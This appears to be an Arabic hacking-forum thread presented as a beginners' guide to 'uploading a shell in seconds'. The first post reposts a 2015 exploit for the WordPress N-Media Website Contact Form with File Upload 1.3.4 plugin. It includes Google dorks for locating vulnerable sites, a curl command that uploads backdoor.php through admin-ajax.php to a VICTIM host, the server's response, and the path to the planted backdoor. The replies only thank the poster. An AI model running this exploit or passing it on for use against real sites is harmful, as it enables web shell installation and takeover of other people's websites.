الحمد لله الذي لولاه ما جرى قلم , ولا تكلم لسان , والصلاة والسلام على ىسيدنا محمد ( صلى الله عليه واله وصحبة وسلم )كان أفصح الناس لسانا وأوضحهم بياناً ...

migamix

New Member
للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015
الحمد لله الذي لولاه ما جرى قلم , ولا تكلم لسان , والصلاة والسلام على ىسيدنا محمد
( صلى الله عليه واله وصحبة وسلم )كان أفصح الناس لسانا وأوضحهم بياناً .
اللهَم صَل َعلىَ محَمد واَل محَمد
...الصلاة و السلام على أشرف المرسليـن ...
... الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا ...
...من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا ...
... و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم ...
... و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين...
...ربنا لا علم لنا إلا ما علمتنا إنك أنت العليم الخبير ...
...ربنا لا فهم لنا إلا ما فهمتنا إنك أنت الجواد الكريم...
...ربي اشرح لي صدري و يسر لي أمري و احلل عقدة من لساني يفقهوا قولي ...
...أما بعد ...
...فإن أصدق الحديث كتاب الله تعالى و خير الهدي هديُ سيدنا محمد صلى الله عليه و سلم...
...و شر الأمور محدثاتها و كل محدثة بدعة و كل بدعة ضلالة و كل ضلالة في النار ...
...فاللهم أجرنا و قنا عذابها برحمتك يا أرحم الراحمين


اليوم مع تغرة بتاريخ 14/04/2015خطيرا جدا تمكن رفع الشيل في تواني

images

كود:
######################
 
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
  
  
 Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
 
 
######################
 
# Backdoor Location:
 
 http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
  
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
            http://ffhd.homelab.it (Free Fuzzy Hashes Database)
                 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################


يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
 
التعديل الأخير بواسطة المشرف:

skrept

New Member
للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015
رد: للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015

مشكووور
 

sqlr

New Member
للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015
رد: للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015

موضوع في القمة شكرا لك​
displayimage.php
 

Cwne

New Member
للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015
رد: للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015

بارك الله فيك . ويعطيك العافية
 

Dr.rhofex

New Member
للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015
رد: للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015

merciii
 

ْXMain

New Member
للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015
رد: للمبتدئين رفع الشيل في تواني exploit wordpress shell upload 14/04/2015

شكراا
 
أعلى